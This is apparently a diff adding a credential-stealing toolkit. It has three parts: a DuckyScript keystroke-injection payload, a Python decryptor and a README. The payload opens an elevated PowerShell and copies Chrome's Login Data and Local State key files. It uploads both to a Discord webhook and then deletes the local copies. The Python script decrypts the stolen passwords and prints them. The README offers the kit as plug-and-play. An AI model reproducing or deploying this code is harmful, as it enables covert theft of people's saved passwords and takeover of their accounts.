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     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Copies the chrome login file and sends it to a discord webhook.
     3 +REM Version: 1.0
     4 +REM Category: Passwords
     5 +DELAY 500
     6 +WINDOWS d
     7 +DELAY 500
     8 +WINDOWS r
     9 +DELAY 500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 800
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 800
     16 +STRING $hookurl = "webhook url here"
     17 +ENTER
     18 +DELAY 300
     19 +STRING function Upload-Discord {[CmdletBinding()] param([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text) $Body = @{'username' = $env:username; 'content' = $text}; if (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}}; $sourceFile = $env:LOCALAPPDATA+'\Google\Chrome\User Data\\Default\\Login Data'; $outputFile = "c:\output.txt"; Copy-Item $sourceFile $outputFile; Upload-Discord -file $outputFile -text ":)"; Remove-Item $outputFile
     20 +ENTER
     21 +DELAY 1000
     22 +STRING $sourceFile = $env:LOCALAPPDATA+'\Google\Chrome\User Data\\Local State'; $outputFile = "c:\key.txt"; Copy-Item $sourceFile $outputFile; Upload-Discord -file $outputFile -text "Key-File"; Remove-Item $outputFile
     23 +ENTER
     24 +DELAY 200
     25 +STRING exit
     26 +ENTER
  • ■ ■ ■ ■ ■ ■
     1 +import os
     2 +import json
     3 +import base64
     4 +import sqlite3
     5 +import win32crypt
     6 +from Crypto.Cipher import AES
     7 +import shutil
     8 +from datetime import timezone, datetime, timedelta
     9 +
     10 +def get_chrome_datetime(chromedate):
     11 + return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
     12 +
     13 +def get_encryption_key():
     14 + local_state_path = "path to key"
     15 + with open(local_state_path, "r", encoding="utf-8") as f:
     16 + local_state = f.read()
     17 + local_state = json.loads(local_state)
     18 +
     19 + key_b64 = local_state["os_crypt"]["encrypted_key"]
     20 + key = base64.b64decode(key_b64)[5:] # remove 'DPAPI' prefix
     21 + return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
     22 +
     23 +def decrypt_password(password, key):
     24 + try:
     25 + # extract initialization vector (IV) and encrypted password
     26 + iv = password[3:15]
     27 + encrypted_password = password[15:]
     28 +
     29 + # create a cipher object using the key and IV
     30 + cipher = AES.new(key, AES.MODE_GCM, iv)
     31 +
     32 + # decrypt the password
     33 + return cipher.decrypt(encrypted_password)[:-16].decode()
     34 + except Exception:
     35 + # fallback to Windows Data Protection API (DPAPI)
     36 + try:
     37 + return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
     38 + except Exception:
     39 + return ""
     40 +
     41 +def main():
     42 + # get the encryption key
     43 + key = get_encryption_key()
     44 +
     45 + # get the path to the Chrome login database
     46 + db_path = "path to encrypted file"
     47 +
     48 + # create a copy of the login database
     49 + filename = "ChromeData.db"
     50 + shutil.copyfile(db_path, filename)
     51 +
     52 + # connect to the copy of the database
     53 + db = sqlite3.connect(filename)
     54 + cursor = db.cursor()
     55 +
     56 + # get the login data
     57 + cursor.execute("SELECT origin_url, action_url, username_value, password_value, date_created, date_last_used FROM logins ORDER BY date_created")
     58 + for row in cursor.fetchall():
     59 + origin_url = row[0]
     60 + action_url = row[1]
     61 + username = row[2]
     62 + password = decrypt_password(row[3], key)
     63 + date_created = row[4]
     64 + date_last_used = row[5]
     65 +
     66 + if username or password:
     67 + print(f"Origin URL: {origin_url}")
     68 + print(f"Action URL: {action_url}")
     69 + print(f"Username: {username}")
     70 + print(f"Password: {password}")
     71 + else:
     72 + continue
     73 + if date_created != 86400000000 and date_created:
     74 + print(f"Creation date: {str(get_chrome_datetime(date_created))}")
     75 + if date_last_used != 86400000000 and date_last_used:
     76 + print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
     77 + print("="*50)
     78 + cursor.close()
     79 + db.close()
     80 + try:
     81 + os.remove(filename)
     82 + except Exception:
     83 + pass
     84 +
     85 +if __name__ == "__main__":
     86 + main()
  • ■ ■ ■ ■ ■ ■
     1 +
     2 +# chrome_passwords_discord
     3 +Grabs the "key" and "login data" file for google chrome and sends them to a discord webhook. To decrypt please read below.
     4 +
     5 +## How to use?
     6 +
     7 +Well this script is kind of plug and play. AFter the two files ("encryped passwords" and "key.txt") got sent to your webhook, you will have to decrypt the passwords.
     8 +
     9 +To do this, I have coded a python program that will use the grabbed "key" to decrypt the passwords.
     10 +
     11 +In the python file, you will have to change 2 paths:
     12 +
     13 +Line 14: ("path to key") insert the filepath to the key txt file on your pc.
     14 +
     15 +Line 46: ("path to encrypted file") insert the filepath to the encrypted login file on your pc.
     16 +
     17 +
     18 +## Features
     19 +
     20 +- open powershell
     21 +- grab 2 files
     22 +- send files to webhook
     23 +
     24 +## Feedback
     25 +
     26 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     27 +
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +## Support
     34 +
     35 +For support, contact me via Discord "UNC0V3R3D#8662".
     36 +
     37 +
     38 +## Meta
     39 +
     40 +
     41 +- If you want to sponsor me on Patreon, the link is on my profile.
     42 +
     43 +
     44 + 
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